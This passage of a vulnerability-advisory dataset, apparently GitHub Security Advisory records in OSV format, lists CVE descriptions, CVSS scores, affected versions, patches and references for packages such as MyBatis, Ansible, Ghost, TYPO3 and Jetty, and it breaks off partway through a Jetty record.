+1.4.0,GHSA-qq48-m4jx-xqh8,2021-04-21T19:54:50Z,2021-04-22T16:14:38Z,,['CVE-2020-26945'],"""Deserialization errors in MyBatis""",MyBatis before 3.5.6 mishandles deserialization of object streams leading to potential cache poisoning.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.mybatis:mybatis'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.5.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26945'}, {'type': 'WEB', 'url': 'https://github.com/mybatis/mybatis-3/pull/2079'}, {'type': 'WEB', 'url': 'https://github.com/mybatis/mybatis-3/releases/tag/mybatis-3.5.6'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-21T19:54:50Z', 'nvd_published_at': '2020-10-10T20:15:00Z'}" +1.4.0,GHSA-936x-wgqv-hhgq,2021-04-06T23:37:56Z,2021-04-13T15:51:33Z,,['CVE-2020-5811'],Authenticated path traversal in Umbraco CMS,"An authenticated path traversal vulnerability exists during package installation in Umbraco CMS <= 8.9.1 or current, which could result in arbitrary files being written outside of the site home and expected paths when installing an Umbraco package.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'UmbracoCms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.9.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5811'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/research/tra-2020-59'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/163965/Umbraco-CMS-8.9.1-Traversal-Arbitrary-File-Write.html'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T23:37:56Z', 'nvd_published_at': '2020-12-30T16:15:00Z'}" +1.4.0,GHSA-fxq4-r6mr-9x64,2021-04-08T16:45:47Z,2021-04-08T16:46:00Z,,[],CSRF Vuln can expose user's QRcode,"### Impact +When a user is setting up two-factor authentication using an authenticator app, a QRcode is generated and made available via a GET request to /tf-qrcode. Since GETs do not have any CSRF protection, it is possible a malicious 3rd party could access the QRcode and therefore gain access to two-factor authentication codes. Note that the /tf-qrcode endpoint is ONLY accessible while the user is initially setting up their device. Once setup is complete, there is no vulnerability. + +### Patches +This is fixed in the upcoming 4.0.0 release. + +### Workarounds +You can provide your own URL for fetching the QRcode by defining SECURITY_TWO_FACTOR_QRCODE_URL and providing your own implementation (that presumably required a POST with CSRF protection). This would require changing the two-factor setup template as well. + +### References +None. + +### For more information +If you have any questions or comments about this advisory: +* Read this pull request: #423",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'Flask-Security-Too'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.2.0'}, {'fixed': '3.4.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Flask-Middleware/flask-security/security/advisories/GHSA-fxq4-r6mr-9x64'}, {'type': 'WEB', 'url': 'https://pypi.org/project/Flask-Security-Too'}]","{'cwe_ids': ['CWE-352'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-04-08T16:45:47Z', 'nvd_published_at': None}" +1.4.0,GHSA-pmpr-vc5q-h3jw,2021-04-09T22:21:38Z,2021-04-13T15:21:59Z,,['CVE-2019-10805'],Exposure of Resource to Wrong Sphere in valib,valib through 2.0.0 allows Internal Property Tampering. A maliciously crafted JavaScript object can bypass several inspection functions provided by valib. Valib uses a built-in function (hasOwnProperty) from the unsafe user-input to examine an object. It is possible for a crafted payload to overwrite this function to manipulate the inspection results to bypass security checks.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'valib'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10805'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-VALIB-559015'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/valib'}]","{'cwe_ids': ['CWE-668'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-09T22:21:38Z', 'nvd_published_at': '2020-02-28T21:15:00Z'}" +1.4.0,GHSA-frxj-5j27-f8rf,2021-08-31T21:09:59Z,2021-04-20T16:44:49Z,,['CVE-2019-14905'],"Externally Controlled Reference to a Resource in Another Sphere, Improper Input Validation, and External Control of File Name or Path in Ansible","A vulnerability was found in Ansible Engine versions 2.9.x before 2.9.3, 2.8.x before 2.8.8, 2.7.x before 2.7.16 and earlier, where in Ansible's nxos_file_copy module can be used to copy files to a flash or bootflash on NXOS devices. Malicious code could craft the filename parameter to perform OS command injections. This could result in a loss of confidentiality of the system among other issues.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.16'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.8.8'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-14905'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0216'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0218'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14905'}, {'type': 'PACKAGE', 'url': 'https://github.com/ansible/ansible'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5BNCYPQ4BY5QHBCJOAOPANB5FHATW2BR/'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00021.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00026.html'}]","{'cwe_ids': ['CWE-20', 'CWE-610', 'CWE-668', 'CWE-73'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-05T14:41:23Z', 'nvd_published_at': '2020-03-31T17:15:00Z'}" +1.4.0,GHSA-3fw4-4h3m-892h,2021-04-09T21:39:10Z,2021-04-13T15:22:19Z,,['CVE-2019-10804'],OS Command Injection in serial-number,serial-number through 1.3.0 allows execution of arbritary commands. The "cmdPrefix" argument in serialNumber function is used by the "exec" function without any validation.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'serial-number'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10804'}, {'type': 'WEB', 'url': 'https://github.com/es128/serial-number/blob/master/index.js#L106'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-SERIALNUMBER-559010'}]","{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-09T21:39:10Z', 'nvd_published_at': '2020-02-28T21:15:00Z'}" +1.4.0,GHSA-g3fq-3v3g-mh32,2021-04-13T18:40:52Z,2021-04-16T19:52:58Z,,['CVE-2021-29438'],Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) in @nextcloud/dialogs,"### Impact + +The Nextcloud dialogs library before 3.1.2 did insufficiently escape text input passed to a toast. If your application displays toasts with user-supplied input, this could lead to a XSS vulnerability. + +_Note_: Nextcloud Server employs a strict Content Security Policy that mitigates the risk of these XSS vulnerabilities. + +### Patches + +The vulnerability has been patched in version 3.1.2. If you need to display HTML in the toast, explicitly pass the `options.isHTML` config flag. + +### Workarounds + +Make sure no user-supplied input flows into toasts.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@nextcloud/dialogs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/nextcloud/nextcloud-dialogs/security/advisories/GHSA-g3fq-3v3g-mh32'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29438'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@nextcloud/dialogs'}]","{'cwe_ids': ['CWE-79', 'CWE-80'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-13T18:40:52Z', 'nvd_published_at': '2021-04-13T20:15:00Z'}" +1.4.0,GHSA-vcg8-98q8-g7mj,2021-08-31T21:10:59Z,2021-04-07T21:47:31Z,,['CVE-2020-1740'],Exposure of Sensitive Information to an Unauthorized Actor and Insecure Temporary File in Ansible,"A flaw was found in Ansible Engine when using Ansible Vault for editing encrypted files. When a user executes ""ansible-vault edit"", another user on the same computer can read the old and new secret, as it is created in a temporary file with mkstemp and the returned file descriptor is closed and the method write_data is called to write the existing secret in the file. This method will delete the file before recreating it insecurely. All versions in 2.7.x, 2.8.x and 2.9.x branches are believed to be vulnerable.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.7.17'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.8.11'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1740'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/issues/67798'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/commit/28f9fbdb5e281976e33f443193047068afb97a9b'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1740'}, {'type': 'PACKAGE', 'url': 'https://github.com/ansible/ansible'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/05/msg00005.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DKPA4KC3OJSUFASUYMG66HKJE7ADNGFW/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MRRYUU5ZBLPBXCYG6CFP35D64NP2UB2S/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WQVOQD4VAIXXTVQAJKTN7NUGTJFE2PCB/'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202006-11'}]","{'cwe_ids': ['CWE-200', 'CWE-377'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-04-05T15:41:07Z', 'nvd_published_at': '2020-03-16T16:15:00Z'}" +1.4.0,GHSA-3gqj-cmxr-p4x2,2023-09-01T10:15:02Z,2021-04-30T17:32:28Z,,['CVE-2016-1000111'],Forced Browsing in Twisted,"Twisted before 16.3.1 does not attempt to address RFC 3875 section 4.1.18 namespace conflicts and therefore does not protect CGI applications from the presence of untrusted client data in the `HTTP_PROXY` environment variable, which might allow remote attackers to redirect a CGI application's outbound HTTP traffic to an arbitrary proxy server via a crafted Proxy header in an HTTP request, aka an `httpoxy` issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Twisted'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '16.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-1000111'}, {'type': 'PACKAGE', 'url': 'https://github.com/twisted/twisted'}, {'type': 'WEB', 'url': 'https://twistedmatrix.com/pipermail/twisted-web/2016-August/005268.html'}, {'type': 'WEB', 'url': 'https://twistedmatrix.com/trac/ticket/8623'}, {'type': 'WEB', 'url': 'https://www.openwall.com/lists/oss-security/2016/07/18/6'}, {'type': 'WEB', 'url': 'http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2016-3090545.html'}]","{'cwe_ids': ['CWE-425'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-23T20:33:04Z', 'nvd_published_at': '2020-03-11T20:15:00Z'}" +1.4.0,GHSA-f248-v4qh-x2r6,2023-08-31T16:38:53Z,2021-04-20T16:29:41Z,,['CVE-2020-27589'],Improper Certificate Validation in blackduck,Synopsys hub-rest-api-python (aka blackduck on PyPI) version 0.0.25 - 0.0.52 does not validate SSL certificates in certain cases.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'blackduck'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.25'}, {'fixed': '0.0.53'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-27589'}, {'type': 'WEB', 'url': 'https://github.com/blackducksoftware/hub-rest-api-python/pull/113/commits/273b27d0de1004389dd8cf43c40b1197c787e7cd'}, {'type': 'WEB', 'url': 'https://community.synopsys.com/s/question/0D52H00005JCZAXSA5/announcement-black-duck-defect-identified'}, {'type': 'PACKAGE', 'url': 'https://github.com/blackducksoftware/hub-rest-api-python'}, {'type': 'WEB', 'url': 'https://pypi.org/project/blackduck/'}, {'type': 'WEB', 'url': 'https://www.optiv.com/explore-optiv-insights/source-zero/certificate-validation-disabled-black-duck-api-wrapper'}]","{'cwe_ids': ['CWE-295'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-19T23:38:37Z', 'nvd_published_at': '2020-11-06T14:15:00Z'}" +1.4.0,GHSA-9fgx-q25h-jxrg,2022-11-21T19:46:10Z,2021-04-29T21:53:18Z,,['CVE-2021-29484'],DOM XSS in Theme Preview,"### Impact +An unused endpoint added during the development of 4.0.0 has left sites vulnerable to untrusted users gaining access to Ghost Admin. Attackers can gain access by getting logged in users to click a link containing malicious code. Users do not need to enter credentials and may not know they've visited a malicious site. + +Ghost(Pro) has already been patched. We can find no evidence that the issue was exploited on Ghost(Pro) prior to the patch being added. + +Self-hosters are impacted if running Ghost a version between 4.0.0 and 4.3.2. Immediate action should be taken to secure your site - see patches & workarounds below. + +### Patches +Fixed in 4.3.3, all 4.x sites should upgrade as soon as possible. +As the endpoint is unused, the patch simply removes it. + +### Workarounds +- Log out of Ghost Admin +- Suspend any users who cannot log out +- Block access to `/ghost/preview` + +Example of how to block access in nginx: + +``` +location ~ /ghost/preview { + rewrite ^(\/(.*\/)?ghost\/)(.*)$ $1 redirect; +} +``` + +This redirects the endpoint to `/ghost/`, which mimics the behaviour after the patch is applied. + +### References + +- [Forum Post](https://forum.ghost.org/t/critical-security-update-available-for-ghost-4-x/22290) + +### For more information +If you have any questions or comments about this advisory: +* email us at security@ghost.org + + +--- +Credits: Paul Gerste, SonarSource (https://www.sonarsource.com/)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'ghost'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.3.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29484'}, {'type': 'WEB', 'url': 'https://github.com/TryGhost/Ghost/commit/14b3431de12e674a0bd562e9230e2891b6903ae2'}, {'type': 'WEB', 'url': 'https://blog.sonarsource.com/ghost-admin-takeover'}, {'type': 'WEB', 'url': 'https://forum.ghost.org/t/critical-security-update-available-for-ghost-4-x/22290'}, {'type': 'PACKAGE', 'url': 'https://github.com/TryGhost/Ghost'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210618-0006/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/ghost'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-29T20:40:06Z', 'nvd_published_at': '2021-04-29T21:15:00Z'}" +1.4.0,GHSA-pgcp-m69h-p2gr,2021-03-24T23:15:17Z,2021-03-29T20:43:08Z,,['CVE-2020-25702'],Cross-site Scripting (XSS) in moodle,"In Moodle, it was possible to include JavaScript when re-naming content bank items. Versions affected: 3.9 to 3.9.2. This is fixed in moodle 3.9.3 and 3.10.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.9.0'}, {'fixed': '3.9.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25702'}, {'type': 'WEB', 'url': 'https://github.com/moodle/moodle/commit/66be08216e647532b295a9132070d2435ecd7ad9'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1895437'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4NNFCHPPHRJNJROIX6SYMHOC6HMKP3GU/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/B55KXBVAT45MDASJ3EK6VIGQOYGJ4NH6/'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=413940'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-24T23:15:17Z', 'nvd_published_at': '2020-11-19T17:15:00Z'}" +1.4.0,GHSA-g4rf-pc26-6hmr,2021-03-29T17:37:02Z,2021-03-23T15:26:49Z,,['CVE-2021-21377'],OMERO webclient does not validate URL redirects on login or switching group.,"### Background +OMERO.web supports redirection to a given URL after performing login or switching the group context. These URLs are not validated, allowing redirection to untrusted sites. OMERO.web 5.9.0 adds URL validation before redirecting. External URLs are not considered valid, unless specified in the ``omero.web.redirect_allowed_hosts`` setting. + +### Impact +OMERO.web before 5.9.0 + +### Patches +5.9.0 + +### Workarounds +No workaround + +### References + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [omero-web](https://github.com/ome/omero-web) +* Email us at [security](mailto:security@openmicroscopy.org.uk)",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'omero-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.9.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ome/omero-web/security/advisories/GHSA-g4rf-pc26-6hmr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21377'}, {'type': 'WEB', 'url': 'https://github.com/ome/omero-web/commit/952f8e5d28532fbb14fb665982211329d137908c'}, {'type': 'WEB', 'url': 'https://github.com/ome/omero-web/blob/master/CHANGELOG.md#590-march-2021'}, {'type': 'WEB', 'url': 'https://pypi.org/project/omero-web/'}, {'type': 'WEB', 'url': 'https://www.openmicroscopy.org/security/advisories/2021-SV2/'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T15:25:55Z', 'nvd_published_at': '2021-03-23T16:15:00Z'}" +1.4.0,GHSA-4jhw-2p6j-5wmp,2021-03-29T18:07:53Z,2021-03-23T01:53:35Z,,['CVE-2021-21338'],Open Redirection in Login Handling," +### Problem +It has been discovered that Login Handling is susceptible to open redirection which allows attackers redirecting to arbitrary content, and conducting phishing attacks. No authentication is required in order to exploit this vulnerability. + +### Solution +Update to TYPO3 versions 6.2.57, 7.6.51, 8.7.40, 9.5.25, 10.4.14, 11.1.1 that fix the problem described. + +### Credits +Thanks to Alexander Kellner who reported this issue and to TYPO3 security team member Torben Hansen who fixed the issue. + +### References +* [TYPO3-CORE-SA-2021-001](https://typo3.org/security/advisory/typo3-core-sa-2021-001)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.2.0'}, {'fixed': '6.2.57'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.2.56'}}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.6.51'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.6.50'}}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.7.40'}]}], 'database_specific': {'last_known_affected_version_range': '<= 8.7.39'}}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.5.25'}]}], 'database_specific': {'last_known_affected_version_range': '<= 9.5.24'}}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.4.14'}]}], 'database_specific': {'last_known_affected_version_range': '<= 10.4.13'}}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 11.1.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/TYPO3.CMS/security/advisories/GHSA-4jhw-2p6j-5wmp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21338'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/typo3/cms-core'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2021-001'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T01:41:01Z', 'nvd_published_at': '2021-03-23T02:15:00Z'}" +1.4.0,GHSA-m394-8rww-3jr7,2021-10-21T14:14:05Z,2021-03-10T03:46:47Z,,['CVE-2020-27223'],DOS vulnerability for Quoted Quality CSV headers,"### Impact +When Jetty handles a request containing request headers with a large number of “quality” (i.e. q) parameters (such as what are seen on the `Accept`, `Accept-Encoding`, and `Accept-Language` request headers), the server may enter a denial of service (DoS) state due to high CPU usage while sorting the list of values based on their quality values. A single request can easily consume minutes of CPU time before it is even dispatched to the application. + +The only features within Jetty that can trigger this behavior are: + +- Default Error Handling - the `Accept` request header with the `QuotedQualityCSV` is used to determine what kind of content to send back to the client (html, text, json, xml, etc) +- `StatisticsServlet` - uses the `Accept` request header with the `QuotedQualityCSV` to determine what kind of content to send back to the client (xml, json, text, html, etc) +- `HttpServletRequest.getLocale()` - uses the `Accept-Language` request header with the `QuotedQualityCSV` to determine which “preferred” language is returned on this call. +- `HttpservletRequest.getLocales()` - is similar to the above, but returns an ordered list of locales based on the quality values on the `Accept-Language` request header. +- `DefaultServlet` - uses the `Accept-Encoding` request header with the `QuotedQualityCSV` to determine which kind of pre-compressed content should be sent back for static content (content that is not matched against a url-pattern in your web app) + +### Versions +`QuotedQualityCSV` was introduced to Jetty 9.3.9.v20160517 and the bug that introduced the vulnerability was in 9.4.6.v20170531. + +Currently, known vulnerable versions include: + +- 9.4.6.v20170531 thru to 9.4.36.v20210114 +- 10.0.0 +- 11.0.0 + +### Workarounds + +Quality ordered values are used infrequently by jetty so they can be avoided by: + + * Do not use the default error page/handler. + * Do not deploy the `StatisticsServlet` exposed to the network + * Do not call `getLocale` API + * Do not enable precompressed static content in the `DefaultServlet` + +### Patches + +All patches are available for download from the Eclipse Jetty website at [https://www.eclipse.org/jetty/download.php](https://www.eclipse.org/jetty/download.php) +- 9.4.37.v20210219 and greater +- 10.0.1 and greater +- 11.0.1 and greater","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.jetty:jetty-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.4.6'}, {'fixed': '9.4.37'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.jetty:jetty-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.0.1'}]}], 'versions': ['10.0.0']}, {'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.jetty:jetty-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.0.1'}]}], 'versions': ['11.0.0']}]","[{'type': 'WEB', 'url': 'https://github.com/eclipse/jetty.project/security/advisories/GHSA-m394-8rww-3jr7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-27223'}, {'type': 'WEB', 'url': 'https://bugs.eclipse.org/bugs/show_bug.cgi?id=571128'}, {'type': 'PACKAGE', 'url': 'https://github.com/eclipse/jetty.project'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r068dfd35ce2193f6af28b74ff29ab148c2b2cacb235995576f5bea78@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r07aedcb1ece62969c406cb84c8f0e22cec7e42cdc272f3176e473320@%3Cusers.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0b639bd9bfaea265022125d18acd2fc6456044b76609ec74772c9567@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0c6eced465950743f3041b03767a32b2e98d19731bd72277fc7ea428@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0cdab13815fc419805a332278c8d27e354e78560944fc36db0bdc760@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0e25cdf3722a24c53049d37396f0da8502cb4b7cdc481650dc601dbc@%3Cgitbox.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r105f4e52feb051faeb9141ef78f909aaf5129d6ed1fc52e099c79463@%3Cissues.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1414ab2b3f4bb4c0e736caff6dc8d15f93f6264f0cca5c47710d7bb3@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1b7ed296a865e3f1337a96ee9cd51f6d154d881a30da36020ca72a4b@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1b803e6ebdac5f670708878fb1b27cd7a0ce9d774a60e797e58cee6f@%3Cissues.nifi.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r26d9196f4d2afb9bec2784bcb6fc183aca82e4119bf41bdc613eec01@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r27ad7843d060762cc942820566eeaa9639f75371afedf8124b943283@%3Cissues.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2c2c7b2971360fb946bbf062c58d7245927dd1ce9150fc9987f65409@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2c947376491a20d1cf143bf3c21ed74113e099d806cfe4c490a45ad8@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 